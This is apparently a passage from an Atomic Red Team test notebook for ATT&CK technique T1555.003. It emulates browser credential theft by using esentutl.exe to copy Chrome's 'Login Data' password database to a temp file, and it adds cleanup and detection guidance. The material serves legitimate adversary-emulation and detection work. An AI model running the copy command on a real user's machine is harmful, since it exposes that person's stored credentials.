if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe") -Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) {exit 0} else {exit 1}
```
##### Get Prereq Commands:
```cmd
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
$installer = "PathToAtomicsFolder\..\ExternalPayloads\ChromeStandaloneSetup64.msi"
Invoke-WebRequest -OutFile "PathToAtomicsFolder\..\ExternalPayloads\ChromeStandaloneSetup64.msi" https://dl.google.com/chrome/install/googlechromestandaloneenterprise64.msi
msiexec /i $installer /qn
Start-Process -FilePath "chrome.exe"
Stop-Process -Name "chrome"

```

In [ ]:
Invoke-AtomicTest T1555.003 -TestNumbers 17 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
esentutl.exe /y "%LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data" /d "%temp%\T1555.003_Login_Data.tmp"
```

In [ ]:
Invoke-AtomicTest T1555.003 -TestNumbers 17

#### Cleanup: 
```cmd
del /f /q %temp%\T1555.003_Login_Data.tmp > nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1555.003 -TestNumbers 17 -Cleanup

## Detection
Identify web browser files that contain credentials such as Google Chrome’s Login Data database file: <code>AppData\Local\Google\Chrome\User Data\Default\Login Data</code>. Monitor file read events of web browser files that contain credentials, especially when the reading process is unrelated to the subject web browser. Monitor process execution logs to include PowerShell Transcription focusing on those that perform a combination of behaviors including reading web browser process memory, utilizing regular expressions, and those that contain numerous keywords for common web applications (Gmail, Twitter, Office365, etc.).